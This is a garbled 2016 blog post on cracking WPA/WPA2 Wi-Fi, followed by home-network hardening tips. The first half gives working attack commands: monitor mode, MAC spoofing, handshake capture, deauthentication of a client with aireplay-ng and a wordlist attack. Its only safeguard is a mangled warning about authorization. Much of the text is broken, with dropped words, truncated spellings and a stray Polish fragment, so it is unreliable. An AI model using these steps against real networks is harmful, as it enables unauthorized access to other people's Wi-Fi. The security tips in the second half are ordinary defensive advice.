Thursday, May 26, 2016

How To Wi-Fi WPA/WPA2 & Secure your Wi-Fi

Warning:::::::Don't any authorized wifi otherwise you go to jail.

WifiTools Workstation(Download) Backtrek 5 (Download)Compatible Wifi Card (Optional)Rules to follow 1.Now you First install a in your system.
2. Then you crte a virtual machine in your .

3.Then power on your machine.
4.And Now your all set to go...just simply follow below

Steps to Followairmon-ngThe result will be something like :

wlan0 5100iwlagn - [phy0]airmon-ng start wlan0(Optional) Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0

Then, press "Ctrl+c" to brk the program.airodump-ng -c 3 -w wpa --bssid ff:ff:ff:ff:ff:ff --ivs mon0*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake
Use the John the Ripper as word list to the WPA/WP2 air-ng -w /pentest/s/john/.lst wpa-01.ivsYou can use your own wordlist. Secure your wifi 1. Choice encrypt
A simple matter . WEP can be in a few minutes, and WPA is relatively wker than WPA2 . Choose WPA2 .No WEP, not WPA . End of story .
WPA2 networks can only attack dictionary attacks , so ...
2. Setting a strong
WPA2 forces us to use at lst 8 character , which in itself is good , but ch character incrses security exponentially , that is, with ch a pool of all possible to erate s of this length grtly incrses. So it rlly makes a difference whether you use a of 8 or a 9 characters.
3.Change the default network name ( SSID)
You have to remember to never lve the default network name , such as " Netgr " and " " . Attackers often carry with them so . rainbow tables , so that brking WPA/WPA2 for the network with the same name takes just a few minutes. ( This is explained in detail in the operation of WPA/WPA2 )If a list of the vein , or as the SSID you set a random string of characters (not recommended ) , s utrudnicie life.4.Change the to the router

Suppose that someone has into your network. Most at ( or similar ) is the router control panel where you can do anything : change the for your network , change the name , disable it , and more.Very often, the router itself is protected by a username and (admin , admin ) , which is not a big obstacle for burglars . Also keep in mind to change the defaults wherever possible.
5.Limiting coverage
Most WiFi intrusions followed by " outsiders" . The neighborhood wireless network card detects a lot of potential victims , most of the apartments around us or from nrby buildings.WiFi network coverage should be chosen so as to cover the whole house , but nothing else. This will prevent any unwanted shares . Frequently in the options you can set the router transmitter power .
6.Filtering MAC / hide the SSID
All the networks are saying not to use the above . techniques , as they are very sy to brk. It is of course true, but ... why not hinder life s ? :)By the way, when we go on vaion and forget to turn off the router and the network is empty there in the ether , hiding the SSID and MAC address filtering is a not - for - workaround. We can not podszpiegować who logs on to the network and change your MAC address on him, because no one logs on to the network. Likewise, we can not use the attack revoke credentials to check a hidden network name , because it is who perform the attack .

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